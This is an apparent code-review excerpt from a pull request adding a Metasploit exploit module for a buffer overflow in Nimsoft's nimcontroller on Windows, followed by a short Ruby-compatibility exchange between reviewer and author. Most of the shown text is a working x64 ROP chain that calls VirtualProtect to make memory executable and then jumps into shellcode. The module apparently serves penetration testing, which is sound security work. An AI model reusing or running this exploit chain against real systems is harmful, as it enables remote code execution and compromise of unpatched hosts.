modules/exploits/windows/nimsoft/nimcontroller_bof.rb

```diff
@@ -0,0 +1,452 @@
+    rop_gadgets += [0x00000001400eade1,       # mov eax, esp ; add rsp, 0x30 ; pop r13 ; pop r12 ; pop rbp ; ret
+                    0x0000000000000000,       #
+                    0x0000000000000000,       #
+                    0x0000000000000000,       #
+                    0x0000000000000000,       #
+                    0x0000000000000000,       #
+                    0x0000000000000000]       #
+    rop_gadgets += [0x0000000140018c42] * 10  # ret
+    rop_gadgets += [0x0000000140131643,       # pop rcx ; ret
+                    0x000000000000059f,       # (offset to *shellcode)
+                    0x000000014006d8d8]       # add rax, rcx ; add rsp, 0x38 ; ret
+    rop_gadgets += [0x0000000140018c42] * 15  # ret
+    rop_gadgets += [0x00000001400b741b]       # xchg eax, ecx ; ret
+    rop_gadgets += [0x00000001400496a2,       # pop rdx ; ret
+                    0x00000000000005dc]       # dwSize
+    rop_gadgets += [0x00000001400bc39c,       # pop r8 ; ret
+                    0x0000000000000040]       # flNewProtect
+    rop_gadgets += [0x00000001400c5f8a]       # mov rax, r11 ; add rsp, 0x38 ; ret (RESTORE VirtualProtectStub)
+    rop_gadgets += [0x0000000140018c42] * 17  # ret
+    rop_gadgets += [0x00000001400a0b55]       # call rax ; mov rdp qword ptr [rsp+48h] ; mov rsi, qword ptr [rsp+50h] ; mov rax, rbx ; mov rbx, qword ptr [rsp + 40h] ; add rsp,30h ; pop rdi ; ret
+    rop_gadgets += [0x0000000140018c42] * 20  # ret
+
+    rop_gadgets += [0x0000000140002ef6,       # pop rax ; ret (CALL COMPLETE, "JUMP" INTO OUR SHELLCODE)
+                    0x0000000000000000,       # (zero out rax)
+                    0x00000001400eade1,       # mov eax, esp ; add rsp, 0x30 ; pop r13 ; pop r12 ; pop rbp ; ret
+                    0x0000000000000000,       #
+                    0x0000000000000000,       #
+                    0x0000000000000000,       #
+                    0x0000000000000000,       #
+                    0x0000000000000000,       #
+                    0x0000000000000000]       #
+    rop_gadgets += [0x0000000140018c42] * 10  # ret
+    rop_gadgets += [0x0000000140131643,       # pop rcx ; ret
+                    0x0000000000000317,       # (offset to our shellcode)
+                    0x000000014006d8d8]       # add rax, rcx ; add rsp, 0x38 ; ret
+    rop_gadgets += [0x0000000140018c42] * 15  # ret
+    rop_gadgets += [0x00000001400a9747]       # jmp rax
+    rop_gadgets += [0x0000000140018c42] * 20  # ret (do not remove)
+
+    return rop_gadgets.pack("<Q*")
+
+  end
+
+  # parse_listing: once the directory_list probe is sent we're returned a directory listing
+  # unfortunately it's hard to read this simply "decodes" it
+  def parse_listing(response, directory)
+
+    result = {"name" => "", "date" => "", "size" => "", "type" => ""}
+    i = 0
+
+    begin
+      dirlist = response.split('\x00')[0].split("\x00")
+      index = dirlist.index("entry") + 3
+      final = dirlist[index..]
```

Comment:
```suggestion
      final = dirlist[index..-1]
```

We still have to support Ruby 2.5 which does not have the endless range syntax available.

Reply:
Ah ok that makes sense 😅, my ruby is rust-y lol